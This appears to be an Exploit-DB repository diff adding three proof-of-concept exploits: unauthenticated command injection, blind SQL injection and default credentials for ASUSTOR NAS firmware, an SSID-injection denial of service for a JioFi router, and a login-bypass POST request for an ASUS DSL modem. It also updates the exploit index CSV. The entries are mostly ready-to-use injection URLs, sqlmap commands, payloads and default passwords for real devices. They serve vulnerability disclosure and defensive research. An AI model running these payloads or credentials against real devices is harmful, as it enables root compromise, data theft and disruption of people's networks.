DB: 2018-08-16

3 changes to exploits/shellcodes

JioFi 4G M2S 1.0.2 - Denial of Service (PoC)
ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection
ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass

exploits/cgi/webapps/45200.txt

@@ -0,0 +1,127 @@
+Product - ASUSTOR ADM - 3.1.0.RFQ3 and all previous builds
+Vendor - https://www.asustor.com/
+Patch Notes - http://download.asustor.com/download/docs/releasenotes/RN_ADM_3.1.3.RHU2.pdf
+
+Issue:  The Asustor NAS appliance on ADM 3.1.0 and before suffer from
+multiple critical vulnerabilities. The vulnerabilities were submitted
+to Asustor in January and February 2018. Several follow-up requests
+were made in an attempt to obtain vendor acknowledgement, however no
+correspondance was ever received. Nevertheless, the vendor did patch
+the RCE issue in the 3.1.3 ADM release on May 31, 2018.
+
+Resolution: Upgrade to newest Asustor firmware, ADM 3.1.3.
+-----------------------------------------------------------------------------------
+
+CVE-2018-11510
+Remote Command Execution (Unauthenticated)
+CWE-78 - Improper Neutralization of Special Elements used in an OS Command
+ASUSTOR ADM - 3.1.0.RFQ3
+------------------------------------------
+
+Weakness : The ASUSTOR ADM 3.1.0.RFQ3 NAS portal suffers from an
+unauthenticated remote code execution vulnerability in the
+portal/apis/aggrecate_js.cgi file by embedding OS commands in the
+'script' parameter. The application fails to santitize user input
+after the cgi file executes a call to a local shell script.
+
+Example POC:
+https://<IP>:8001/portal/apis/aggrecate_js.cgi?script=launcher%22%26ls%20-ltr%26%22
+
+Exploitation of this vulnerability allows an attacker execution of
+arbitrary commands on the host operating system, as the root user,
+remotely and unauthenticated. This is a complete compromise of the
+appliance.
+
+Exploits with Metasploit module can be found here:
+https://github.com/mefulton/CVE-2018-11510/
+------------------------------------------------------------------------------------
+
+CVE-2018-11511
+Blind SQL Injections
+CWE-89: Improper Neutralization of Special Elements used in an SQL Command
+ASUSTOR Photo Gallery Application - ADM 3.1.0.RFQ3
+------------------------------------------
+
+Weakness : The tree list functionality in the photo gallery
+application in ASUSTOR ADM 3.1.0.RFQ3 has a SQL injection
+vulnerability that affects the 'album_id' or 'scope' parameter via a
+photo-gallery/api/album/tree_lists/ URI.
+
+POC
+sqlmap -u "https://<IP>/photo-gallery/api/album/tree_lists/"
+--data="album_id=123456789&start=0&limit=100&order=name_asc&api=v2"
+  --random-agent --risk=2 --dbms=mysql
+
+Parameter: album_id (POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: album_id=106299411 AND
+4644=4644&start=0&limit=100&order=name_asc&api=v2
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: album_id=106299411 AND
+SLEEP(5)&start=0&limit=100&order=name_asc&api=v2
+
+
+sqlmap -u "https://IP/photo-gallery/api/photo/search/"
+--data="keyword=jpg&scope=123456789&start=0&limit=100&order=name_asc&api_mode=browse&api=v2"
+--random-agent --dbms=mysql --risk=2
+
+Parameter: scope (POST)
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: keyword=jpg&scope=106299414 AND
+SLEEP(5)&start=0&limit=100&order=name_asc&api_mode=browse&api=v2
+------------------------------------------------------------------------------------
+
+CVE-2018-11509
+Default credentials and remote access (Multiple Applications)
+CWE-255 Credentials Management
+ASUSTOR ADM 3.1.0.RFQ3
+------------------------------------------
+
+Weakness : When the end user completes setup for the ASUSTOR Nas
+appliance, a single congratulations web page appears, usually on port
+80, stating setup is complete. This "setup complete" web page however
+is served publicly, and is available to anyone with no authentication.
+>From this page it is possible to access all of the add-on applications
+the end usr installs on the NAS, which are available from their online
+repository, by simply browsing to each add-on directory.
+
+For many of these apps, for example phpmyadmin. virtualbox, owncloud,
+photo-gallery, etc., the files are installed under the /volume1/Web/
+folder, which is t the same directory as the 'setup complete' page is
+located.
+
+URL http://<IP>/phpmyadmin/ username/password - root:admin
+URL http://<IP>/virtualbox/ username/password - admin:admin
+URL http://<IP>/wordpress/ setup file available
+
+The application does prompt the user to change the admin account for
+the NAS itself, however, the end user is never prompted to change the
+default passwords on the add-on  applications.
+
+This allows an attacker root level access to the application which in
+turn can be used to upload a webshell onto the appliance. It also
+allow access to all data the end user uploads to the NAS.
+
+Furthermore, the NAS itself has a default account nvradmin, which has
+permission to log into the admin portal. While the nvradmin account
+does not have most admin permissions, it still allows an attacker to
+access many of the browser file functions, and gain a foothold on the
+appliance.
+
+URL http://<IP>:8001/portal/ username/password nvradmin:nvradmin
+
+An attacker can determine installed applications and attack default
+credentials that are not changed upon NAS initialization, which
+enables them to  compromise end user data or gain root access on the
+appliance.
+-----------------------------------------------------------------------------------
+
+[Researchers]
+Kyle Lovett - (twitter - @SquirrelBuddha)
+Matthew Fulton (twitter - @haqur)
+https://www.purehacking.com/blog/matthew-fulton/
+https://github.com/mefulton/CVE-2018-11510/

exploits/hardware/dos/45199.txt

@@ -0,0 +1,24 @@
+# Exploit Title: JioFi 4G M2S 1.0.2 - Denial of Service (PoC)
+# Exploit Author:  Vikas Chaudhary
+# Date: 2018-07-26
+# Vendor Homepage: https://www.jio.com/
+# Hardware Link:  https://www.amazon.in/JioFi-Hotspot-M2S-Portable-Device/dp/B075P7BLV5/ref=sr_1_1?s=computers&ie=UTF8&qid=1531032476&sr=1-1&keywords=JioFi+M2S+Wireless+Data+Card++%28Black%29
+# Version: JioFi 4G Hotspot M2S 150 Mbps Wireless Router
+# Category: Hardware
+# Tested on: Windows 10
+# CVE: CVE-2018-15181
+
+# Proof Of Concept:
+01- First Open BurpSuite
+02- Make Intercept on 
+03 -Go to your Wifi Router Gateway  and log in  [i.e http://192.168.225.1 ]
+04- Go To => Setting=> WiFi
+06- In SSID type "Testing"  and   in Security Key  type  "12345678" .
+06- Click on Apply
+07- Burp will Capture the Intercepts.
+08- Copy  this code     "o<x>nmouseover=alert<x>(1) and paste it after the SSID name  and Security Key
+09- You will see that your Net connection will lost and Router will shutdown and Restart..
+10- The Router will  RESTART  and your SSID name will change to this    "o<x>nmouseover=alert<x>(1)//
+11- Now again go to Wifi router gateway and loged in
+12- You will see that the SSID name and Security Key  will be Blank
+13- Again try to Change the SSID name - YOU CAN'T ,  If you force it  to change , You have to OPEN  Your Wireless Security and that is unsecure .  (Open wifi=> Without Password)

exploits/hardware/webapps/45201.txt

@@ -0,0 +1,21 @@
+# Title: ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass
+# Author: AmnBAN team
+# Date: 2018-08-06
+# Vendor Homepage: https://www.asus.com/Networking/DSLN10_C1_with_5dBi_antenna/
+# Sofrware version: 1.1.2.2_17
+# CVE: N/A
+
+# 1. Description:
+# In ASUS-DSL N10 C1 modem Firmware Version 1.1.2.2_17 there is login_authorization 
+# parameter in post data, that use for authorization access to admin panel, 
+# the data of this parameter is not fully random and you can use old data 
+# or data of another device to access admin panel.
+
+# 2. Proof of Concept:
+# Browse http://<Your Modem IP>/login.cgi
+
+# Send this post data:
+group_id=&action_mode=&action_script=&action_wait=5&current_page=Main_Login.asp&next_page=%2Fcgi-bin%2FAdvanced_LAN_Content.asp&login_authorization=YWRtaW46MQ%3D%2D
+
+# Or this post data:
+group_id=&action_mode=&action_script=&action_wait=5&current_page=Main_Login.asp&next_page=%2Fcgi-bin%2FAdvanced_LAN_Content.asp&login_authorization=FWRtaW46MQ%3D5D

files_exploits.csv

@@ -6045,6 +6045,7 @@ id,file,description,date,author,type,platform,port
 45186,exploits/windows/dos/45186.py,"Acunetix WVS 10.0 Build 20150623 - Denial of Service (PoC)",2018-08-13,"Javier Enrique Rodriguez Gutierrez",dos,windows,
 45187,exploits/hardware/dos/45187.py,"PLC Wireless Router GPN2.4P21-C-CN - Denial of Service",2018-08-13,"Chris Rose",dos,hardware,
 45191,exploits/windows_x86/dos/45191.py,"Switch Port Mapping Tool 2.81.2 - 'Name Field' Denial of Service (PoC)",2018-08-13,"Shubham Singh",dos,windows_x86,
+45199,exploits/hardware/dos/45199.txt,"JioFi 4G M2S 1.0.2 - Denial of Service (PoC)",2018-08-15,"Vikas Chaudhary",dos,hardware,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -39797,3 +39798,5 @@ id,file,description,date,author,type,platform,port
 45190,exploits/multiple/webapps/45190.txt,"IBM Sterling B2B Integrator 5.2.0.1/5.2.6.3 - Cross-Site Scripting",2018-08-13,"Vikas Khanna",webapps,multiple,
 45195,exploits/linux/webapps/45195.rb,"cgit 1.2.1 - Directory Traversal (Metasploit)",2018-08-14,"Dhiraj Mishra",webapps,linux,
 45196,exploits/windows/webapps/45196.rb,"Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit)",2018-08-14,Metasploit,webapps,windows,4848
+45200,exploits/cgi/webapps/45200.txt,"ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection",2018-08-15,"Kyle Lovett",webapps,cgi,8001
+45201,exploits/hardware/webapps/45201.txt,"ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass",2018-08-15,AmnBAN,webapps,hardware,